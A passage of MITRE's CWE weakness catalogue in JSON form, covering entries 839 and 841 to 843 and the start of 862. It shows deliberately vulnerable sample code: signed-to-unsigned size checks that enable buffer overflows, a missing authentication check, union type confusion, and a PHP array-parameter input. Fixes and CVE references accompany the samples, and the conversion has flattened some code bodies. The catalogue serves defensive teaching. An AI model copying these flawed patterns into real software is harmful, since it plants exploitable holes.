account."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1023","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"195","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"682","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"119","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"124","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Often"}},{"attr":{"@_Name":"C++","@_Prevalence":"Often"}}]},"Alternate_Terms":{"Alternate_Term":{"Term":"Signed comparison","Description":"The \\"signed comparison\\" term is often used to describe when the program uses a signed variable and checks it to ensure that it is less than a maximum value (typically a maximum buffer size), but does not verify that it is greater than 0."}},"Common_Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality","Availability"],"Impact":["Modify Application Data","Execute Unauthorized Code or Commands"],"Note":"An attacker could modify the structure of the message or data being sent to the downstream component, possibly injecting commands."},{"Scope":"Availability","Impact":"DoS: Resource Consumption (Other)","Note":"in some contexts, a negative value could lead to resource consumption."},{"Scope":["Confidentiality","Integrity"],"Impact":["Modify Memory","Read Memory"],"Note":"If a negative value is used to access memory, buffers, or other indexable structures, it could access memory outside the bounds of the buffer."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Strategy":"Enforcement by Conversion","Description":"If the number to be used is always expected to be positive, change the variable type from signed to unsigned or size_t."},{"Phase":"Implementation","Strategy":"Input Validation","Description":"If the number to be used could have a negative value based on the specification (thus requiring a signed value), but the number should only be positive to preserve code correctness, then include a check to ensure that the value is positive."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-21"},"Intro_Text":"The following code is intended to read an incoming packet from a socket and extract one or more headers.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"DataPacket *packet;int numHeaders;PacketHeader *headers;sock=AcceptSocketConnection();ReadPacket(packet, sock);numHeaders =packet-&gt;headers;if (numHeaders &gt; 100) {}headers = malloc(numHeaders * sizeof(PacketHeader);ParsePacketHeaders(packet, headers);","xhtml:br":["","","","","","","","","",""],"xhtml:div":{"#text":"ExitError(\\"too many headers!\\");","attr":{"@_style":"margin-left:10px;"}}}},"Body_Text":"The code performs a check to make sure that the packet does not contain too many headers. However, numHeaders is defined as a signed int, so it could be negative. If the incoming packet specifies a value such as -3, then the malloc calculation will generate a negative number (say, -300 if each header can be a maximum of 100 bytes). When this result is provided to malloc(), it is first converted to a size_t type. This conversion then produces a large value such as 4294966996, which may cause malloc() to fail or to allocate an extremely large amount of memory (CWE-195). With the appropriate negative numbers, an attacker could trick malloc() into using a very small positive number, which then allocates a buffer that is much smaller than expected, potentially leading to a buffer overflow."},{"attr":{"@_Demonstrative_Example_ID":"DX-23"},"Intro_Text":"The following code reads a maximum size and performs a sanity check on that size. It then performs a strncpy, assuming it will not exceed the boundaries of the array. While the use of \\"short s\\" is forced in this particular example, short int\'s are frequently used within real-world code, such as code that processes structured data.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int GetUntrustedInt () {}void main (int argc, char **argv) {}","xhtml:div":[{"#text":"return(0x0000FFFF);","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char path[256];char *input;int i;short s;unsigned int sz;i = GetUntrustedInt();s = i;/* s is -1 so it passes the safety check - CWE-697 */if (s &gt; 256) {}/* s is sign-extended and saved in sz */sz = s;/* output: i=65535, s=-1, sz=4294967295 - your mileage may vary */printf(\\"i=%d, s=%d, sz=%u\\\\n\\", i, s, sz);input = GetUserInput(\\"Enter pathname:\\");/* strncpy interprets s as unsigned int, so it\'s treated as MAX_INT(CWE-195), enabling buffer overflow (CWE-119) */strncpy(path, input, s);path[255] = \'\\\\0\'; /* don\'t want CWE-170 */printf(\\"Path is: %s\\\\n\\", path);","xhtml:br":["","","","","","","","","","","","","","","","","","","","","","",""],"xhtml:div":{"#text":"DiePainfully(\\"go away!\\\\n\\");","attr":{"@_style":"margin-left:10px;"}}}}],"xhtml:br":["",""]}},"Body_Text":"This code first exhibits an example of CWE-839, allowing \\"s\\" to be a negative number. When the negative short \\"s\\" is converted to an unsigned integer, it becomes an extremely large positive integer. When this converted integer is used by strncpy() it will lead to a buffer overflow (CWE-119)."},{"attr":{"@_Demonstrative_Example_ID":"DX-100"},"Intro_Text":"In the following code, the method retrieves a value from an array at a specific array index location that is given as an input parameter to the method","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int getValueFromArray(int *array, int len, int index) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int value;if (index &lt; len) {}else {}return value;","xhtml:br":["","","","","","","","","","","",""],"xhtml:i":["// check that the array index is less than the maximum","// length of the array","// if array index is invalid then output error message","// and return value indicating error"],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"value = array[index];","xhtml:br":["",""],"xhtml:i":"// get the value at the specified index of the array"}},{"#text":"printf(\\"Value is: %d\\\\n\\", array[index]);value = -1;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"...if (index &gt;= 0 &amp;&amp; index &lt; len) {...","xhtml:br":["","","","","","","",""],"xhtml:i":["// check that the array index is within the correct","// range of values for the array"]}}],"Body_Text":"However, this method only verifies that the given array index is less than the maximum length of the array but does not check for the minimum value (CWE-839). This will allow a negative value to be accepted as the input array index, which will result in a out of bounds read (CWE-125) and may allow access to sensitive memory. The input array index should be checked to verify that is within the maximum and minimum range required for the array (CWE-129). In this example the if statement should be modified to include a minimum range check, as shown below."},{"Intro_Text":"The following code shows a simple BankAccount class with deposit and withdraw methods.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class BankAccount {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public final int MAXIMUM_WITHDRAWAL_LIMIT = 350;private double accountBalance;public BankAccount() {}public void deposit(double depositAmount) {...}public void withdraw(double withdrawAmount) {}...","xhtml:br":["","","","","","","","","","","","","","","",""],"xhtml:i":["// variable for bank account balance","// constructor for BankAccount","// method to deposit amount into BankAccount","// method to withdraw amount from BankAccount","// other methods for accessing the BankAccount object"],"xhtml:div":[{"#text":"accountBalance = 0;","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (withdrawAmount &lt; MAXIMUM_WITHDRAWAL_LIMIT) {}else {}","xhtml:br":["",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"double newBalance = accountBalance - withdrawAmount;accountBalance = newBalance;","xhtml:br":["",""]}},{"#text":"System.err.println(\\"Withdrawal amount exceeds the maximum limit allowed, please try again...\\");...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}]}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public class BankAccount {","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public final int MINIMUM_WITHDRAWAL_LIMIT = 0;public final int MAXIMUM_WITHDRAWAL_LIMIT = 350;...public void withdraw(double withdrawAmount) {","xhtml:br":["","","","","","",""],"xhtml:i":"// method to withdraw amount from BankAccount","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (withdrawAmount &lt; MAXIMUM_WITHDRAWAL_LIMIT &amp;&amp;withdrawAmount &gt; MINIMUM_WITHDRAWAL_LIMIT) {","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...","xhtml:br":""}}}}}}}}],"Body_Text":["The withdraw method includes a check to ensure that the withdrawal amount does not exceed the maximum limit allowed, however the method does not check to ensure that the withdrawal amount is greater than a minimum value (CWE-129). Performing a range check on a value that does not include a minimum check can have significant security implications, in this case not including a minimum range check can allow a negative value to be used which would cause the financial application using this class to deposit money into the user account rather than withdrawing. In this example the if statement should the modified to include a minimum range check, as shown below.","Note that this example does not protect against concurrent access to the BankAccount balance variable, see CWE-413 and CWE-362.","While it is out of scope for this example, note that the use of doubles or floats in financial calculations may be subject to certain kinds of attacks where attackers use rounding errors to steal money."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2010-1866","Description":"Chain: integer overflow causes a negative signed value, which later bypasses a maximum-only check, leading to heap-based buffer overflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1866"},{"Reference":"CVE-2009-1099","Description":"Chain: 16-bit counter can be interpreted as a negative value, compared to a 32-bit maximum value, leading to buffer under-write.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1099"},{"Reference":"CVE-2011-0521","Description":"Chain: kernel\'s lack of a check for a negative value leads to memory corruption.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0521"},{"Reference":"CVE-2010-3704","Description":"Chain: parser uses atoi() but does not check for a negative value, which can happen on some platforms, leading to buffer under-write.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3704"},{"Reference":"CVE-2010-2530","Description":"Chain: Negative value stored in an int bypasses a size check and causes allocation of large amounts of memory.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2530"},{"Reference":"CVE-2009-3080","Description":"Chain: negative offset value to IOCTL bypasses check for maximum index, then used as an array index for buffer under-read.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3080"},{"Reference":"CVE-2008-6393","Description":"chain: file transfer client performs signed comparison, leading to integer overflow and heap-based buffer overflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6393"},{"Reference":"CVE-2008-4558","Description":"chain: negative ID in media player bypasses check for maximum index, then used as an array index for buffer under-read.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4558"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 6, &#34;Type Conversion Vulnerabilities&#34; Page 246"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 6, &#34;Comparisons&#34;, Page 265"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2011-03-24"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"}]}},"841":{"attr":{"@_ID":"841","@_Name":"Improper Enforcement of Behavioral Workflow","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software supports a session in which more than one behavior must be performed by an actor, but it does not properly ensure that the actor performs the behaviors in the required sequence.","Extended_Description":{"xhtml:p":["By performing actions in an unexpected order, or by omitting steps, an attacker could manipulate the business logic of the software or cause it to enter an invalid state. In some cases, this can also expose resultant weaknesses.","For example, a file-sharing protocol might require that an actor perform separate steps to provide a username, then a password, before being able to transfer files. If the file-sharing server accepts a password command followed by a transfer command, without any username being provided, the software might still perform the transfer.","Note that this is different than CWE-696, which focuses on when the software performs actions in the wrong sequence; this entry is closely related, but it is focused on ensuring that the actor performs actions in the correct sequence.","Workflow-related behaviors include:"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Steps are performed in the expected order.","Required steps are not omitted.","Steps are not interrupted.","Steps are performed in a timely fashion."]}}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"691","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Alter Execution Logic","Note":"An attacker could cause the software to skip critical steps or perform them in the wrong order, bypassing its intended business logic. This can sometimes have security implications."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This code is part of an FTP server and deals with various commands that could be sent by a user. It is intended that a user must successfully login before performing any other action such as retrieving or listing files.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Python"},"xhtml:div":{"#text":"def dispatchCommand(command, user, args):","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if command == \'Login\':if command == \'Retrieve_file\':if command == \'List_files\':","xhtml:div":[{"#text":"loginUser(args)return","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"if authenticated(user) and ownsFile(user,args):sendFile(args)return","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]},{"#text":"listFiles(args)return","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}],"xhtml:br":["","","","","",""],"xhtml:i":["# user has requested a file","..."]}}}},{"attr":{"@_Nature":"good","@_Language":"Python"},"xhtml:div":{"#text":"def dispatchCommand(command, user, args):","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if command == \'List_files\':","xhtml:br":["","","",""],"xhtml:i":["...","..."],"xhtml:div":{"#text":"if authenticated(user) and ownsDirectory(user,args):","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"listFiles(args)return","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}}}}],"Body_Text":["The server correctly does not send files to a user that isn\'t logged in and doesnt own the file. However, the server will incorrectly list the files in any directory without confirming the command came from an authenticated user, and that the user is authorized to see the directory\'s contents.","Here is a fixed version of the above example:"]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2011-0348","Description":"Bypass of access/billing restrictions by sending traffic to an unrestricted destination before sending to a restricted destination.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0348"},{"Reference":"CVE-2007-3012","Description":"Attacker can access portions of a restricted page by canceling out of a dialog.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3012"},{"Reference":"CVE-2009-5056","Description":"Ticket-tracking system does not enforce a permission setting.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-5056"},{"Reference":"CVE-2004-2164","Description":"Shopping cart does not close a database connection when user restores a previous order, leading to connection exhaustion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2164"},{"Reference":"CVE-2003-0777","Description":"Chain: product does not properly handle dropped connections, leading to missing NULL terminator (CWE-170) and segmentation fault.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0777"},{"Reference":"CVE-2005-3327","Description":"Chain: Authentication bypass by skipping the first startup step as required by the protocol.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3327"},{"Reference":"CVE-2004-0829","Description":"Chain: File server crashes when sent a \\"find next\\" request without an initial \\"find first.\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0829"},{"Reference":"CVE-2010-2620","Description":"FTP server allows remote attackers to bypass authentication by sending (1) LIST, (2) RETR, (3) STOR, or other commands without performing the required login steps first.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2620"},{"Reference":"CVE-2005-3296","Description":"FTP server allows remote attackers to list arbitrary directories as root by running the LIST command before logging in.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3296"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":40,"Entry_Name":"Insufficient Process Validation"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-795"}},{"attr":{"@_External_Reference_ID":"REF-796"}},{"attr":{"@_External_Reference_ID":"REF-797"}},{"attr":{"@_External_Reference_ID":"REF-806"}},{"attr":{"@_External_Reference_ID":"REF-799"}},{"attr":{"@_External_Reference_ID":"REF-667"}},{"attr":{"@_External_Reference_ID":"REF-801"}},{"attr":{"@_External_Reference_ID":"REF-802","@_Section":"pages 29 - 41"}}]},"Notes":{"Note":{"attr":{"@_Type":"Research Gap"},"xhtml:p":["This weakness is typically associated with business logic flaws, except when it produces resultant weaknesses.","The classification of business logic flaws has been under-studied, although exploitation of business flaws frequently happens in real-world systems, and many applied vulnerability researchers investigate them. The greatest focus is in web applications. There is debate within the community about whether these problems represent particularly new concepts, or if they are variations of well-known principles.","Many business logic flaws appear to be oriented toward business processes, application flows, and sequences of behaviors, which are not as well-represented in CWE as weaknesses related to input validation, memory management, etc."]}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2011-03-24"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences, Observed_Examples, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"842":{"attr":{"@_ID":"842","@_Name":"Placement of User into Incorrect Group","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software or the administrator places a user into an incorrect group.","Extended_Description":"If the incorrect group has more access or privileges than the intended group, the user might be able to bypass intended security policy to access unexpected resources or perform unexpected actions. The access-control system might not be able to detect malicious usage of this group membership.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"286","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity"}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-1999-1193","Description":"Operating system assigns user to privileged wheel group, allowing the user to gain root privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1193"},{"Reference":"CVE-2010-3716","Description":"Chain: drafted web request allows the creation of users with arbitrary group membership.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3716"},{"Reference":"CVE-2008-5397","Description":"Chain: improper processing of configuration options causes users to contain unintended group memberships.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5397"},{"Reference":"CVE-2007-6644","Description":"CMS does not prevent remote administrators from promoting other users to the administrator group, in violation of the intended security model.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6644"},{"Reference":"CVE-2007-3260","Description":"Product assigns members to the root group, allowing escalation of privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3260"},{"Reference":"CVE-2002-0080","Description":"Chain: daemon does not properly clear groups before dropping privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0080"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2011-03-24"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"843":{"attr":{"@_ID":"843","@_Name":"Access of Resource Using Incompatible Type (\'Type Confusion\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The program allocates or initializes a resource such as a pointer, object, or variable using one type, but it later accesses that resource using a type that is incompatible with the original type.","Extended_Description":{"xhtml:p":["When the program accesses the resource using an incompatible type, this could trigger logical errors because the resource does not have expected properties. In languages without memory safety, such as C and C++, type confusion can lead to out-of-bounds memory access.","While this weakness is frequently associated with unions when parsing data with many different embedded object types in C, it can be present in any application that can interpret the same variable or memory location in multiple ways.","This weakness is not unique to C and C++. For example, errors in PHP applications can be triggered by providing array parameters when scalars are expected, or vice versa. Languages such as Perl, which perform automatic conversion of a variable of one type when it is accessed as if it were another type, can also contain these issues."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"704","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"704","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"119","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Alternate_Terms":{"Alternate_Term":{"Term":"Object Type Confusion"}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Availability","Integrity","Confidentiality"],"Impact":["Read Memory","Modify Memory","Execute Unauthorized Code or Commands","DoS: Crash, Exit, or Restart"],"Note":"When a memory buffer is accessed using the wrong type, it could read or write memory out of the bounds of the buffer, if the allocated buffer is smaller than the type that the code is attempting to access, leading to a crash and possibly code execution."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following code uses a union to support the representation of different types of messages. It formats messages differently, depending on their type.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#define NAME_TYPE 1#define ID_TYPE 2struct MessageBuffer{};int main (int argc, char **argv) {}","xhtml:br":["","","","","","",""],"xhtml:div":[{"#text":"int msgType;union {};","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"char *name;int nameID;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"struct MessageBuffer buf;char *defaultMessage = \\"Hello World\\";buf.msgType = NAME_TYPE;buf.name = defaultMessage;printf(\\"Pointer of buf.name is %p\\\\n\\", buf.name);buf.nameID = (int)(defaultMessage + 1);printf(\\"Pointer of buf.name is now %p\\\\n\\", buf.name);if (buf.msgType == NAME_TYPE) {}else {}","xhtml:br":["","","","","","","","","","",""],"xhtml:i":"/* This particular value for nameID is used to make the code architecture-independent. If coming from untrusted input, it could be any value. */","xhtml:div":[{"#text":"printf(\\"Message: %s\\\\n\\", buf.name);","attr":{"@_style":"margin-left:10px;"}},{"#text":"printf(\\"Message: Use ID %d\\\\n\\", buf.nameID);","attr":{"@_style":"margin-left:10px;"}}]}}]}},"Body_Text":["The code intends to process the message as a NAME_TYPE, and sets the default message to \\"Hello World.\\" However, since both buf.name and buf.nameID are part of the same union, they can act as aliases for the same memory location, depending on memory layout after compilation.","As a result, modification of buf.nameID - an int - can effectively modify the pointer that is stored in buf.name - a string.","Execution of the program might generate output such as:",{"xhtml:div":{"xhtml:div":["Pointer of name is 10830","Pointer of name is now 10831","Message: ello World"]}},"Notice how the pointer for buf.name was changed, even though buf.name was not explicitly modified.","In this case, the first \\"H\\" character of the message is omitted. However, if an attacker is able to fully control the value of buf.nameID, then buf.name could contain an arbitrary pointer, leading to out-of-bounds reads or writes."]},{"Intro_Text":"The following PHP code accepts a value, adds 5, and prints the sum.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$value = $_GET[\'value\'];$sum = $value + 5;echo \\"value parameter is \'$value\'&lt;p&gt;\\";echo \\"SUM is $sum\\";","xhtml:br":["","",""]}},"Body_Text":["When called with the following query string:",{"xhtml:div":{"xhtml:div":"value=123"}},"the program calculates the sum and prints out:",{"xhtml:div":{"xhtml:div":"SUM is 128"}},"However, the attacker could supply a query string such as:",{"xhtml:div":{"xhtml:div":"value[]=123"}},"The \\"[]\\" array syntax causes $value to be treated as an array type, which then generates a fatal error when calculating $sum:",{"xhtml:div":{"xhtml:div":"Fatal error: Unsupported operand types in program.php on line 2"}}]},{"Intro_Text":"The following Perl code is intended to look up the privileges for user ID\'s between 0 and 3, by performing an access of the $UserPrivilegeArray reference. It is expected that only userID 3 is an admin (since this is listed in the third element of the array).","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"my $UserPrivilegeArray = [\\"user\\", \\"user\\", \\"admin\\", \\"user\\"];my $userID = get_current_user_ID();if ($UserPrivilegeArray eq \\"user\\") {}else {}print \\"\\\\$UserPrivilegeArray = $UserPrivilegeArray\\\\n\\";","xhtml:br":["","","","","","",""],"xhtml:div":[{"#text":"print \\"Regular user!\\\\n\\";","attr":{"@_style":"margin-left:10px;"}},{"#text":"print \\"Admin!\\\\n\\";","attr":{"@_style":"margin-left:10px;"}}]}},"Body_Text":["In this case, the programmer intended to use \\"$UserPrivilegeArray-&gt;{$userID}\\" to access the proper position in the array. But because the subscript was omitted, the \\"user\\" string was compared to the scalar representation of the $UserPrivilegeArray reference, which might be of the form \\"ARRAY(0x229e8)\\" or similar.","Since the logic also \\"fails open\\" (CWE-636), the result of this bug is that all users are assigned administrator privileges.","While this is a forced example, it demonstrates how type confusion can have security consequences, even in memory-safe languages."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2010-4577","Description":"Type confusion in CSS sequence leads to out-of-bounds read.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4577"},{"Reference":"CVE-2011-0611","Description":"Size inconsistency allows code execution, first discovered when it was actively exploited in-the-wild.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0611"},{"Reference":"CVE-2010-0258","Description":"Improperly-parsed file containing records of different types leads to code execution when a memory location is interpreted as a different object than intended.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0258"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"EXP39-C","Entry_Name":"Do not access a variable through a pointer of an incompatible type","Mapping_Fit":"Exact"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-811","@_Section":"&#34;Type Confusion Vulnerabilities,&#34; page 59"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 7, &#34;Type Confusion&#34;, Page 319"}}]},"Notes":{"Note":[{"attr":{"@_Type":"Applicable Platform"},"xhtml:p":"This weakness is possible in any type-unsafe programming language."},{"attr":{"@_Type":"Research Gap"},"xhtml:p":["Type confusion weaknesses have received some attention by applied researchers and major software vendors for C and C++ code. Some publicly-reported vulnerabilities probably have type confusion as a root-cause weakness, but these may be described as \\"memory corruption\\" instead. This weakness seems likely to gain prominence in upcoming years.","For other languages, there are very few public reports of type confusion weaknesses. These are probably under-studied. Since many programs rely directly or indirectly on loose typing, a potential \\"type confusion\\" behavior might be intentional, possibly requiring more manual analysis."]}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2011-05-15"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Common_Consequences, Relationships"}]}},"862":{"attr":{"@_ID":"862","@_Name":"Missing Authorization","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not perform an authorization check when an actor attempts to access a resource or perform an action.","Extended_Description":{"xhtml:p":["Assuming a user with a given identity, authorization is the process of determining whether that user can access a given resource, based on the user\'s privileges and any permissions or other access-control specifications that apply to the resource.","When access control checks are not applied, users are able to access data or perform actions that they should not be allowed to perform. This can lead to a wide range of problems, including information exposures, denial of service, and arbitrary code 